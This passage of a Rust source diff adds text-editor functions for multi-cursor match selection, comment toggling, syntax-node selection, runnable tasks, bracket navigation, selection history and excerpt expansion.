query.is_empty(); + let select_state = SelectNextState { + query: AhoCorasick::new(&[query])?, + wordwise: true, + done: is_empty, + }; + self.select_next_state = Some(select_state); + } else { + self.select_next_state = None; + } + } else if let Some(selected_text) = selected_text { + self.select_next_state = Some(SelectNextState { + query: AhoCorasick::new(&[selected_text])?, + wordwise: false, + done: false, + }); + self.select_next_match_internal( + display_map, + replace_newest, + autoscroll, + window, + cx, + )?; + } + } + Ok(()) + } + + pub fn select_all_matches( + 
&mut self, + _action: &SelectAllMatches, + window: &mut Window, + cx: &mut Context, + ) -> Result<()> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + self.push_to_selection_history(); + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + + self.select_next_match_internal(&display_map, false, None, window, cx)?; + let Some(select_next_state) = self.select_next_state.as_mut() else { + return Ok(()); + }; + if select_next_state.done { + return Ok(()); + } + + let mut new_selections = Vec::new(); + + let reversed = self.selections.oldest::(cx).reversed; + let buffer = &display_map.buffer_snapshot; + let query_matches = select_next_state + .query + .stream_find_iter(buffer.bytes_in_range(0..buffer.len())); + + for query_match in query_matches.into_iter() { + let query_match = query_match.context("query match for select all action")?; // can only fail due to I/O + let offset_range = if reversed { + query_match.end()..query_match.start() + } else { + query_match.start()..query_match.end() + }; + let display_range = offset_range.start.to_display_point(&display_map) + ..offset_range.end.to_display_point(&display_map); + + if !select_next_state.wordwise + || (!movement::is_inside_word(&display_map, display_range.start) + && !movement::is_inside_word(&display_map, display_range.end)) + { + new_selections.push(offset_range.start..offset_range.end); + } + } + + select_next_state.done = true; + self.unfold_ranges(&new_selections.clone(), false, false, cx); + self.change_selections(None, window, cx, |selections| { + selections.select_ranges(new_selections) + }); + + Ok(()) + } + + pub fn select_next( + &mut self, + action: &SelectNext, + window: &mut Window, + cx: &mut Context, + ) -> Result<()> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.push_to_selection_history(); + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + self.select_next_match_internal( + &display_map, + 
action.replace_newest, + Some(Autoscroll::newest()), + window, + cx, + )?; + Ok(()) + } + + pub fn select_previous( + &mut self, + action: &SelectPrevious, + window: &mut Window, + cx: &mut Context, + ) -> Result<()> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.push_to_selection_history(); + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let buffer = &display_map.buffer_snapshot; + let mut selections = self.selections.all::(cx); + if let Some(mut select_prev_state) = self.select_prev_state.take() { + let query = &select_prev_state.query; + if !select_prev_state.done { + let first_selection = selections.iter().min_by_key(|s| s.id).unwrap(); + let last_selection = selections.iter().max_by_key(|s| s.id).unwrap(); + let mut next_selected_range = None; + // When we're iterating matches backwards, the oldest match will actually be the furthest one in the buffer. + let bytes_before_last_selection = + buffer.reversed_bytes_in_range(0..last_selection.start); + let bytes_after_first_selection = + buffer.reversed_bytes_in_range(first_selection.end..buffer.len()); + let query_matches = query + .stream_find_iter(bytes_before_last_selection) + .map(|result| (last_selection.start, result)) + .chain( + query + .stream_find_iter(bytes_after_first_selection) + .map(|result| (buffer.len(), result)), + ); + for (end_offset, query_match) in query_matches { + let query_match = query_match.unwrap(); // can only fail due to I/O + let offset_range = + end_offset - query_match.end()..end_offset - query_match.start(); + let display_range = offset_range.start.to_display_point(&display_map) + ..offset_range.end.to_display_point(&display_map); + + if !select_prev_state.wordwise + || (!movement::is_inside_word(&display_map, display_range.start) + && !movement::is_inside_word(&display_map, display_range.end)) + { + next_selected_range = Some(offset_range); + break; + } + } + + if let Some(next_selected_range) = next_selected_range { + 
self.unfold_ranges(&[next_selected_range.clone()], false, true, cx); + self.change_selections(Some(Autoscroll::newest()), window, cx, |s| { + if action.replace_newest { + s.delete(s.newest_anchor().id); + } + if last_selection.reversed { + s.insert_range(next_selected_range.end..next_selected_range.start); + } else { + s.insert_range(next_selected_range); + } + }); + } else { + select_prev_state.done = true; + } + } + + self.select_prev_state = Some(select_prev_state); + } else { + let mut only_carets = true; + let mut same_text_selected = true; + let mut selected_text = None; + + let mut selections_iter = selections.iter().peekable(); + while let Some(selection) = selections_iter.next() { + if selection.start != selection.end { + only_carets = false; + } + + if same_text_selected { + if selected_text.is_none() { + selected_text = + Some(buffer.text_for_range(selection.range()).collect::()); + } + + if let Some(next_selection) = selections_iter.peek() { + if next_selection.range().len() == selection.range().len() { + let next_selected_text = buffer + .text_for_range(next_selection.range()) + .collect::(); + if Some(next_selected_text) != selected_text { + same_text_selected = false; + selected_text = None; + } + } else { + same_text_selected = false; + selected_text = None; + } + } + } + } + + if only_carets { + for selection in &mut selections { + let word_range = movement::surrounding_word( + &display_map, + selection.start.to_display_point(&display_map), + ); + selection.start = word_range.start.to_offset(&display_map, Bias::Left); + selection.end = word_range.end.to_offset(&display_map, Bias::Left); + selection.goal = SelectionGoal::None; + selection.reversed = false; + } + if selections.len() == 1 { + let selection = selections + .last() + .expect("ensured that there's only one selection"); + let query = buffer + .text_for_range(selection.start..selection.end) + .collect::(); + let is_empty = query.is_empty(); + let select_state = SelectNextState { + query: 
AhoCorasick::new(&[query.chars().rev().collect::()])?, + wordwise: true, + done: is_empty, + }; + self.select_prev_state = Some(select_state); + } else { + self.select_prev_state = None; + } + + self.unfold_ranges( + &selections.iter().map(|s| s.range()).collect::>(), + false, + true, + cx, + ); + self.change_selections(Some(Autoscroll::newest()), window, cx, |s| { + s.select(selections); + }); + } else if let Some(selected_text) = selected_text { + self.select_prev_state = Some(SelectNextState { + query: AhoCorasick::new(&[selected_text.chars().rev().collect::()])?, + wordwise: false, + done: false, + }); + self.select_previous(action, window, cx)?; + } + } + Ok(()) + } + + pub fn find_next_match( + &mut self, + _: &FindNextMatch, + window: &mut Window, + cx: &mut Context, + ) -> Result<()> { + let selections = self.selections.disjoint_anchors(); + match selections.first() { + Some(first) if selections.len() >= 2 => { + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_ranges([first.range()]); + }); + } + _ => self.select_next( + &SelectNext { + replace_newest: true, + }, + window, + cx, + )?, + } + Ok(()) + } + + pub fn find_previous_match( + &mut self, + _: &FindPreviousMatch, + window: &mut Window, + cx: &mut Context, + ) -> Result<()> { + let selections = self.selections.disjoint_anchors(); + match selections.last() { + Some(last) if selections.len() >= 2 => { + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_ranges([last.range()]); + }); + } + _ => self.select_previous( + &SelectPrevious { + replace_newest: true, + }, + window, + cx, + )?, + } + Ok(()) + } + + pub fn toggle_comments( + &mut self, + action: &ToggleComments, + window: &mut Window, + cx: &mut Context, + ) { + if self.read_only(cx) { + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let text_layout_details = &self.text_layout_details(window); + self.transact(window, cx, |this, window, cx| { + let mut selections 
= this.selections.all::(cx); + let mut edits = Vec::new(); + let mut selection_edit_ranges = Vec::new(); + let mut last_toggled_row = None; + let snapshot = this.buffer.read(cx).read(cx); + let empty_str: Arc = Arc::default(); + let mut suffixes_inserted = Vec::new(); + let ignore_indent = action.ignore_indent; + + fn comment_prefix_range( + snapshot: &MultiBufferSnapshot, + row: MultiBufferRow, + comment_prefix: &str, + comment_prefix_whitespace: &str, + ignore_indent: bool, + ) -> Range { + let indent_size = if ignore_indent { + 0 + } else { + snapshot.indent_size_for_line(row).len + }; + + let start = Point::new(row.0, indent_size); + + let mut line_bytes = snapshot + .bytes_in_range(start..snapshot.max_point()) + .flatten() + .copied(); + + // If this line currently begins with the line comment prefix, then record + // the range containing the prefix. + if line_bytes + .by_ref() + .take(comment_prefix.len()) + .eq(comment_prefix.bytes()) + { + // Include any whitespace that matches the comment prefix. 
+ let matching_whitespace_len = line_bytes + .zip(comment_prefix_whitespace.bytes()) + .take_while(|(a, b)| a == b) + .count() as u32; + let end = Point::new( + start.row, + start.column + comment_prefix.len() as u32 + matching_whitespace_len, + ); + start..end + } else { + start..start + } + } + + fn comment_suffix_range( + snapshot: &MultiBufferSnapshot, + row: MultiBufferRow, + comment_suffix: &str, + comment_suffix_has_leading_space: bool, + ) -> Range { + let end = Point::new(row.0, snapshot.line_len(row)); + let suffix_start_column = end.column.saturating_sub(comment_suffix.len() as u32); + + let mut line_end_bytes = snapshot + .bytes_in_range(Point::new(end.row, suffix_start_column.saturating_sub(1))..end) + .flatten() + .copied(); + + let leading_space_len = if suffix_start_column > 0 + && line_end_bytes.next() == Some(b' ') + && comment_suffix_has_leading_space + { + 1 + } else { + 0 + }; + + // If this line currently begins with the line comment prefix, then record + // the range containing the prefix. + if line_end_bytes.by_ref().eq(comment_suffix.bytes()) { + let start = Point::new(end.row, suffix_start_column - leading_space_len); + start..end + } else { + end..end + } + } + + // TODO: Handle selections that cross excerpts + for selection in &mut selections { + let start_column = snapshot + .indent_size_for_line(MultiBufferRow(selection.start.row)) + .len; + let language = if let Some(language) = + snapshot.language_scope_at(Point::new(selection.start.row, start_column)) + { + language + } else { + continue; + }; + + selection_edit_ranges.clear(); + + // If multiple selections contain a given row, avoid processing that + // row more than once. 
+ let mut start_row = MultiBufferRow(selection.start.row); + if last_toggled_row == Some(start_row) { + start_row = start_row.next_row(); + } + let end_row = + if selection.end.row > selection.start.row && selection.end.column == 0 { + MultiBufferRow(selection.end.row - 1) + } else { + MultiBufferRow(selection.end.row) + }; + last_toggled_row = Some(end_row); + + if start_row > end_row { + continue; + } + + // If the language has line comments, toggle those. + let mut full_comment_prefixes = language.line_comment_prefixes().to_vec(); + + // If ignore_indent is set, trim spaces from the right side of all full_comment_prefixes + if ignore_indent { + full_comment_prefixes = full_comment_prefixes + .into_iter() + .map(|s| Arc::from(s.trim_end())) + .collect(); + } + + if !full_comment_prefixes.is_empty() { + let first_prefix = full_comment_prefixes + .first() + .expect("prefixes is non-empty"); + let prefix_trimmed_lengths = full_comment_prefixes + .iter() + .map(|p| p.trim_end_matches(' ').len()) + .collect::>(); + + let mut all_selection_lines_are_comments = true; + + for row in start_row.0..=end_row.0 { + let row = MultiBufferRow(row); + if start_row < end_row && snapshot.is_line_blank(row) { + continue; + } + + let prefix_range = full_comment_prefixes + .iter() + .zip(prefix_trimmed_lengths.iter().copied()) + .map(|(prefix, trimmed_prefix_len)| { + comment_prefix_range( + snapshot.deref(), + row, + &prefix[..trimmed_prefix_len], + &prefix[trimmed_prefix_len..], + ignore_indent, + ) + }) + .max_by_key(|range| range.end.column - range.start.column) + .expect("prefixes is non-empty"); + + if prefix_range.is_empty() { + all_selection_lines_are_comments = false; + } + + selection_edit_ranges.push(prefix_range); + } + + if all_selection_lines_are_comments { + edits.extend( + selection_edit_ranges + .iter() + .cloned() + .map(|range| (range, empty_str.clone())), + ); + } else { + let min_column = selection_edit_ranges + .iter() + .map(|range| range.start.column) + .min() 
+ .unwrap_or(0); + edits.extend(selection_edit_ranges.iter().map(|range| { + let position = Point::new(range.start.row, min_column); + (position..position, first_prefix.clone()) + })); + } + } else if let Some((full_comment_prefix, comment_suffix)) = + language.block_comment_delimiters() + { + let comment_prefix = full_comment_prefix.trim_end_matches(' '); + let comment_prefix_whitespace = &full_comment_prefix[comment_prefix.len()..]; + let prefix_range = comment_prefix_range( + snapshot.deref(), + start_row, + comment_prefix, + comment_prefix_whitespace, + ignore_indent, + ); + let suffix_range = comment_suffix_range( + snapshot.deref(), + end_row, + comment_suffix.trim_start_matches(' '), + comment_suffix.starts_with(' '), + ); + + if prefix_range.is_empty() || suffix_range.is_empty() { + edits.push(( + prefix_range.start..prefix_range.start, + full_comment_prefix.clone(), + )); + edits.push((suffix_range.end..suffix_range.end, comment_suffix.clone())); + suffixes_inserted.push((end_row, comment_suffix.len())); + } else { + edits.push((prefix_range, empty_str.clone())); + edits.push((suffix_range, empty_str.clone())); + } + } else { + continue; + } + } + + drop(snapshot); + this.buffer.update(cx, |buffer, cx| { + buffer.edit(edits, None, cx); + }); + + // Adjust selections so that they end before any comment suffixes that + // were inserted. 
+ let mut suffixes_inserted = suffixes_inserted.into_iter().peekable(); + let mut selections = this.selections.all::(cx); + let snapshot = this.buffer.read(cx).read(cx); + for selection in &mut selections { + while let Some((row, suffix_len)) = suffixes_inserted.peek().copied() { + match row.cmp(&MultiBufferRow(selection.end.row)) { + Ordering::Less => { + suffixes_inserted.next(); + continue; + } + Ordering::Greater => break, + Ordering::Equal => { + if selection.end.column == snapshot.line_len(row) { + if selection.is_empty() { + selection.start.column -= suffix_len as u32; + } + selection.end.column -= suffix_len as u32; + } + break; + } + } + } + } + + drop(snapshot); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(selections) + }); + + let selections = this.selections.all::(cx); + let selections_on_single_row = selections.windows(2).all(|selections| { + selections[0].start.row == selections[1].start.row + && selections[0].end.row == selections[1].end.row + && selections[0].start.row == selections[0].end.row + }); + let selections_selecting = selections + .iter() + .any(|selection| selection.start != selection.end); + let advance_downwards = action.advance_downwards + && selections_on_single_row + && !selections_selecting + && !matches!(this.mode, EditorMode::SingleLine { .. 
}); + + if advance_downwards { + let snapshot = this.buffer.read(cx).snapshot(cx); + + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_cursors_with(|display_snapshot, display_point, _| { + let mut point = display_point.to_point(display_snapshot); + point.row += 1; + point = snapshot.clip_point(point, Bias::Left); + let display_point = point.to_display_point(display_snapshot); + let goal = SelectionGoal::HorizontalPosition( + display_snapshot + .x_for_display_point(display_point, text_layout_details) + .into(), + ); + (display_point, goal) + }) + }); + } + }); + } + + pub fn select_enclosing_symbol( + &mut self, + _: &SelectEnclosingSymbol, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let buffer = self.buffer.read(cx).snapshot(cx); + let old_selections = self.selections.all::(cx).into_boxed_slice(); + + fn update_selection( + selection: &Selection, + buffer_snap: &MultiBufferSnapshot, + ) -> Option> { + let cursor = selection.head(); + let (_buffer_id, symbols) = buffer_snap.symbols_containing(cursor, None)?; + for symbol in symbols.iter().rev() { + let start = symbol.range.start.to_offset(buffer_snap); + let end = symbol.range.end.to_offset(buffer_snap); + let new_range = start..end; + if start < selection.start || end > selection.end { + return Some(Selection { + id: selection.id, + start: new_range.start, + end: new_range.end, + goal: SelectionGoal::None, + reversed: selection.reversed, + }); + } + } + None + } + + let mut selected_larger_symbol = false; + let new_selections = old_selections + .iter() + .map(|selection| match update_selection(selection, &buffer) { + Some(new_selection) => { + if new_selection.range() != selection.range() { + selected_larger_symbol = true; + } + new_selection + } + None => selection.clone(), + }) + .collect::>(); + + if selected_larger_symbol { + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + 
s.select(new_selections); + }); + } + } + + pub fn select_larger_syntax_node( + &mut self, + _: &SelectLargerSyntaxNode, + window: &mut Window, + cx: &mut Context, + ) { + let Some(visible_row_count) = self.visible_row_count() else { + return; + }; + let old_selections: Box<[_]> = self.selections.all::(cx).into(); + if old_selections.is_empty() { + return; + } + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let buffer = self.buffer.read(cx).snapshot(cx); + + let mut selected_larger_node = false; + let mut new_selections = old_selections + .iter() + .map(|selection| { + let old_range = selection.start..selection.end; + + if let Some((node, _)) = buffer.syntax_ancestor(old_range.clone()) { + // manually select word at selection + if ["string_content", "inline"].contains(&node.kind()) { + let word_range = { + let display_point = buffer + .offset_to_point(old_range.start) + .to_display_point(&display_map); + let Range { start, end } = + movement::surrounding_word(&display_map, display_point); + start.to_point(&display_map).to_offset(&buffer) + ..end.to_point(&display_map).to_offset(&buffer) + }; + // ignore if word is already selected + if !word_range.is_empty() && old_range != word_range { + let last_word_range = { + let display_point = buffer + .offset_to_point(old_range.end) + .to_display_point(&display_map); + let Range { start, end } = + movement::surrounding_word(&display_map, display_point); + start.to_point(&display_map).to_offset(&buffer) + ..end.to_point(&display_map).to_offset(&buffer) + }; + // only select word if start and end point belongs to same word + if word_range == last_word_range { + selected_larger_node = true; + return Selection { + id: selection.id, + start: word_range.start, + end: word_range.end, + goal: SelectionGoal::None, + reversed: selection.reversed, + }; + } + } + } + } + + let mut new_range = old_range.clone(); + let mut new_node = 
None; + while let Some((node, containing_range)) = buffer.syntax_ancestor(new_range.clone()) + { + new_node = Some(node); + new_range = match containing_range { + MultiOrSingleBufferOffsetRange::Single(_) => break, + MultiOrSingleBufferOffsetRange::Multi(range) => range, + }; + if !display_map.intersects_fold(new_range.start) + && !display_map.intersects_fold(new_range.end) + { + break; + } + } + + if let Some(node) = new_node { + // Log the ancestor, to support using this action as a way to explore TreeSitter + // nodes. Parent and grandparent are also logged because this operation will not + // visit nodes that have the same range as their parent. + log::info!("Node: {node:?}"); + let parent = node.parent(); + log::info!("Parent: {parent:?}"); + let grandparent = parent.and_then(|x| x.parent()); + log::info!("Grandparent: {grandparent:?}"); + } + + selected_larger_node |= new_range != old_range; + Selection { + id: selection.id, + start: new_range.start, + end: new_range.end, + goal: SelectionGoal::None, + reversed: selection.reversed, + } + }) + .collect::>(); + + if !selected_larger_node { + return; // don't put this call in the history + } + + // scroll based on transformation done to the last selection created by the user + let (last_old, last_new) = old_selections + .last() + .zip(new_selections.last().cloned()) + .expect("old_selections isn't empty"); + + // revert selection + let is_selection_reversed = { + let should_newest_selection_be_reversed = last_old.start != last_new.start; + new_selections.last_mut().expect("checked above").reversed = + should_newest_selection_be_reversed; + should_newest_selection_be_reversed + }; + + if selected_larger_node { + self.select_syntax_node_history.disable_clearing = true; + self.change_selections(None, window, cx, |s| { + s.select(new_selections.clone()); + }); + self.select_syntax_node_history.disable_clearing = false; + } + + let start_row = last_new.start.to_display_point(&display_map).row().0; + let end_row = 
last_new.end.to_display_point(&display_map).row().0; + let selection_height = end_row - start_row + 1; + let scroll_margin_rows = self.vertical_scroll_margin() as u32; + + let fits_on_the_screen = visible_row_count >= selection_height + scroll_margin_rows * 2; + let scroll_behavior = if fits_on_the_screen { + self.request_autoscroll(Autoscroll::fit(), cx); + SelectSyntaxNodeScrollBehavior::FitSelection + } else if is_selection_reversed { + self.scroll_cursor_top(&ScrollCursorTop, window, cx); + SelectSyntaxNodeScrollBehavior::CursorTop + } else { + self.scroll_cursor_bottom(&ScrollCursorBottom, window, cx); + SelectSyntaxNodeScrollBehavior::CursorBottom + }; + + self.select_syntax_node_history.push(( + old_selections, + scroll_behavior, + is_selection_reversed, + )); + } + + pub fn select_smaller_syntax_node( + &mut self, + _: &SelectSmallerSyntaxNode, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + if let Some((mut selections, scroll_behavior, is_selection_reversed)) = + self.select_syntax_node_history.pop() + { + if let Some(selection) = selections.last_mut() { + selection.reversed = is_selection_reversed; + } + + self.select_syntax_node_history.disable_clearing = true; + self.change_selections(None, window, cx, |s| { + s.select(selections.to_vec()); + }); + self.select_syntax_node_history.disable_clearing = false; + + match scroll_behavior { + SelectSyntaxNodeScrollBehavior::CursorTop => { + self.scroll_cursor_top(&ScrollCursorTop, window, cx); + } + SelectSyntaxNodeScrollBehavior::FitSelection => { + self.request_autoscroll(Autoscroll::fit(), cx); + } + SelectSyntaxNodeScrollBehavior::CursorBottom => { + self.scroll_cursor_bottom(&ScrollCursorBottom, window, cx); + } + } + } + } + + fn refresh_runnables(&mut self, window: &mut Window, cx: &mut Context) -> Task<()> { + if !EditorSettings::get_global(cx).gutter.runnables { + self.clear_tasks(); + return Task::ready(()); + } + let project = 
self.project.as_ref().map(Entity::downgrade); + let task_sources = self.lsp_task_sources(cx); + cx.spawn_in(window, async move |editor, cx| { + cx.background_executor().timer(UPDATE_DEBOUNCE).await; + let Some(project) = project.and_then(|p| p.upgrade()) else { + return; + }; + let Ok(display_snapshot) = editor.update(cx, |this, cx| { + this.display_map.update(cx, |map, cx| map.snapshot(cx)) + }) else { + return; + }; + + let hide_runnables = project + .update(cx, |project, cx| { + // Do not display any test indicators in non-dev server remote projects. + project.is_via_collab() && project.ssh_connection_string(cx).is_none() + }) + .unwrap_or(true); + if hide_runnables { + return; + } + let new_rows = + cx.background_spawn({ + let snapshot = display_snapshot.clone(); + async move { + Self::fetch_runnable_ranges(&snapshot, Anchor::min()..Anchor::max()) + } + }) + .await; + let Ok(lsp_tasks) = + cx.update(|_, cx| crate::lsp_tasks(project.clone(), &task_sources, None, cx)) + else { + return; + }; + let lsp_tasks = lsp_tasks.await; + + let Ok(mut lsp_tasks_by_rows) = cx.update(|_, cx| { + lsp_tasks + .into_iter() + .flat_map(|(kind, tasks)| { + tasks.into_iter().filter_map(move |(location, task)| { + Some((kind.clone(), location?, task)) + }) + }) + .fold(HashMap::default(), |mut acc, (kind, location, task)| { + let buffer = location.target.buffer; + let buffer_snapshot = buffer.read(cx).snapshot(); + let offset = display_snapshot.buffer_snapshot.excerpts().find_map( + |(excerpt_id, snapshot, _)| { + if snapshot.remote_id() == buffer_snapshot.remote_id() { + display_snapshot + .buffer_snapshot + .anchor_in_excerpt(excerpt_id, location.target.range.start) + } else { + None + } + }, + ); + if let Some(offset) = offset { + let task_buffer_range = + location.target.range.to_point(&buffer_snapshot); + let context_buffer_range = + task_buffer_range.to_offset(&buffer_snapshot); + let context_range = BufferOffset(context_buffer_range.start) + 
..BufferOffset(context_buffer_range.end); + + acc.entry((buffer_snapshot.remote_id(), task_buffer_range.start.row)) + .or_insert_with(|| RunnableTasks { + templates: Vec::new(), + offset, + column: task_buffer_range.start.column, + extra_variables: HashMap::default(), + context_range, + }) + .templates + .push((kind, task.original_task().clone())); + } + + acc + }) + }) else { + return; + }; + + let rows = Self::runnable_rows(project, display_snapshot, new_rows, cx.clone()); + editor + .update(cx, |editor, _| { + editor.clear_tasks(); + for (key, mut value) in rows { + if let Some(lsp_tasks) = lsp_tasks_by_rows.remove(&key) { + value.templates.extend(lsp_tasks.templates); + } + + editor.insert_tasks(key, value); + } + for (key, value) in lsp_tasks_by_rows { + editor.insert_tasks(key, value); + } + }) + .ok(); + }) + } + fn fetch_runnable_ranges( + snapshot: &DisplaySnapshot, + range: Range, + ) -> Vec { + snapshot.buffer_snapshot.runnable_ranges(range).collect() + } + + fn runnable_rows( + project: Entity, + snapshot: DisplaySnapshot, + runnable_ranges: Vec, + mut cx: AsyncWindowContext, + ) -> Vec<((BufferId, BufferRow), RunnableTasks)> { + runnable_ranges + .into_iter() + .filter_map(|mut runnable| { + let tasks = cx + .update(|_, cx| Self::templates_with_tags(&project, &mut runnable.runnable, cx)) + .ok()?; + if tasks.is_empty() { + return None; + } + + let point = runnable.run_range.start.to_point(&snapshot.buffer_snapshot); + + let row = snapshot + .buffer_snapshot + .buffer_line_for_row(MultiBufferRow(point.row))? 
+ .1 + .start + .row; + + let context_range = + BufferOffset(runnable.full_range.start)..BufferOffset(runnable.full_range.end); + Some(( + (runnable.buffer_id, row), + RunnableTasks { + templates: tasks, + offset: snapshot + .buffer_snapshot + .anchor_before(runnable.run_range.start), + context_range, + column: point.column, + extra_variables: runnable.extra_captures, + }, + )) + }) + .collect() + } + + fn templates_with_tags( + project: &Entity, + runnable: &mut Runnable, + cx: &mut App, + ) -> Vec<(TaskSourceKind, TaskTemplate)> { + let (inventory, worktree_id, file) = project.read_with(cx, |project, cx| { + let (worktree_id, file) = project + .buffer_for_id(runnable.buffer, cx) + .and_then(|buffer| buffer.read(cx).file()) + .map(|file| (file.worktree_id(cx), file.clone())) + .unzip(); + + ( + project.task_store().read(cx).task_inventory().cloned(), + worktree_id, + file, + ) + }); + + let mut templates_with_tags = mem::take(&mut runnable.tags) + .into_iter() + .flat_map(|RunnableTag(tag)| { + inventory + .as_ref() + .into_iter() + .flat_map(|inventory| { + inventory.read(cx).list_tasks( + file.clone(), + Some(runnable.language.clone()), + worktree_id, + cx, + ) + }) + .filter(move |(_, template)| { + template.tags.iter().any(|source_tag| source_tag == &tag) + }) + }) + .sorted_by_key(|(kind, _)| kind.to_owned()) + .collect::>(); + if let Some((leading_tag_source, _)) = templates_with_tags.first() { + // Strongest source wins; if we have worktree tag binding, prefer that to + // global and language bindings; + // if we have a global binding, prefer that to language binding. 
+ let first_mismatch = templates_with_tags + .iter() + .position(|(tag_source, _)| tag_source != leading_tag_source); + if let Some(index) = first_mismatch { + templates_with_tags.truncate(index); + } + } + + templates_with_tags + } + + pub fn move_to_enclosing_bracket( + &mut self, + _: &MoveToEnclosingBracket, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_offsets_with(|snapshot, selection| { + let Some(enclosing_bracket_ranges) = + snapshot.enclosing_bracket_ranges(selection.start..selection.end) + else { + return; + }; + + let mut best_length = usize::MAX; + let mut best_inside = false; + let mut best_in_bracket_range = false; + let mut best_destination = None; + for (open, close) in enclosing_bracket_ranges { + let close = close.to_inclusive(); + let length = close.end() - open.start; + let inside = selection.start >= open.end && selection.end <= *close.start(); + let in_bracket_range = open.to_inclusive().contains(&selection.head()) + || close.contains(&selection.head()); + + // If best is next to a bracket and current isn't, skip + if !in_bracket_range && best_in_bracket_range { + continue; + } + + // Prefer smaller lengths unless best is inside and current isn't + if length > best_length && (best_inside || !inside) { + continue; + } + + best_length = length; + best_inside = inside; + best_in_bracket_range = in_bracket_range; + best_destination = Some( + if close.contains(&selection.start) && close.contains(&selection.end) { + if inside { open.end } else { open.start } + } else if inside { + *close.start() + } else { + *close.end() + }, + ); + } + + if let Some(destination) = best_destination { + selection.collapse_to(destination, SelectionGoal::None); + } + }) + }); + } + + pub fn undo_selection( + &mut self, + _: &UndoSelection, + window: &mut Window, + cx: &mut Context, + ) { + 
self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.end_selection(window, cx); + self.selection_history.mode = SelectionHistoryMode::Undoing; + if let Some(entry) = self.selection_history.undo_stack.pop_back() { + self.change_selections(None, window, cx, |s| { + s.select_anchors(entry.selections.to_vec()) + }); + self.select_next_state = entry.select_next_state; + self.select_prev_state = entry.select_prev_state; + self.add_selections_state = entry.add_selections_state; + self.request_autoscroll(Autoscroll::newest(), cx); + } + self.selection_history.mode = SelectionHistoryMode::Normal; + } + + pub fn redo_selection( + &mut self, + _: &RedoSelection, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.end_selection(window, cx); + self.selection_history.mode = SelectionHistoryMode::Redoing; + if let Some(entry) = self.selection_history.redo_stack.pop_back() { + self.change_selections(None, window, cx, |s| { + s.select_anchors(entry.selections.to_vec()) + }); + self.select_next_state = entry.select_next_state; + self.select_prev_state = entry.select_prev_state; + self.add_selections_state = entry.add_selections_state; + self.request_autoscroll(Autoscroll::newest(), cx); + } + self.selection_history.mode = SelectionHistoryMode::Normal; + } + + pub fn expand_excerpts( + &mut self, + action: &ExpandExcerpts, + _: &mut Window, + cx: &mut Context, + ) { + self.expand_excerpts_for_direction(action.lines, ExpandExcerptDirection::UpAndDown, cx) + } + + pub fn expand_excerpts_down( + &mut self, + action: &ExpandExcerptsDown, + _: &mut Window, + cx: &mut Context, + ) { + self.expand_excerpts_for_direction(action.lines, ExpandExcerptDirection::Down, cx) + } + + pub fn expand_excerpts_up( + &mut self, + action: &ExpandExcerptsUp, + _: &mut Window, + cx: &mut Context, + ) { + self.expand_excerpts_for_direction(action.lines, ExpandExcerptDirection::Up, cx) + } + + pub fn 
expand_excerpts_for_direction( + &mut self, + lines: u32, + direction: ExpandExcerptDirection, + + cx: &mut Context, + ) { + let selections = self.selections.disjoint_anchors(); + + let lines = if lines == 0 { + EditorSettings::get_global(cx).expand_excerpt_lines + } else { + lines + }; + + self.buffer.update(cx, |buffer, cx| { + let snapshot = buffer.snapshot(cx); + let mut excerpt_ids = selections + .iter() + .flat_map(|selection| snapshot.excerpt_ids_for_range(selection.range())) + .collect::>(); + excerpt_ids.sort(); + excerpt_ids.dedup(); + buffer.expand_excerpts(excerpt_ids, lines, direction, cx) + }) + } + + pub fn expand_excerpt( + &mut self, + excerpt: ExcerptId, + direction: ExpandExcerptDirection, + window: &mut Window, + cx: &mut Context, + ) { + let current_scroll_position = self.scroll_position(cx); + let lines_to_expand = EditorSettings::get_global(cx).expand_excerpt_lines; + let mut should_scroll_up = false; + + if direction == ExpandExcerptDirection::Down { + let multi_buffer = self.buffer.read(cx); + let snapshot = multi_buffer.snapshot(cx); + if let Some(buffer_id) = snapshot.buffer_id_for_excerpt(excerpt) { + if let Some(buffer) = multi_buffer.buffer(buffer_id) { + if let Some(excerpt_range) = snapshot.buffer_range_for_excerpt(excerpt) { + let buffer_snapshot = buffer.read(cx).snapshot(); + let excerpt_end_row = + Point::from_anchor(&excerpt_range.end, &buffer_snapshot).row; + let last_row = buffer_snapshot.max_point().row; + let lines_below = last_row.saturating_sub(excerpt_end_row); + should_scroll_up = lines_below >= lines_to_expand; + } + } + } + } + + self.buffer.update(cx, |buffer, cx| { + buffer.expand_excerpts([excerpt], lines_to_expand, direction, cx) + }); + + if should_scroll_up { + let new_scroll_position = + current_scroll_position + gpui::Point::new(0.0, lines_to_expand as f32); + self.set_scroll_position(new_scroll_position, window, cx); + } + } + + pub fn go_to_singleton_buffer_point( + &mut self, + point: Point, + window: &mut 
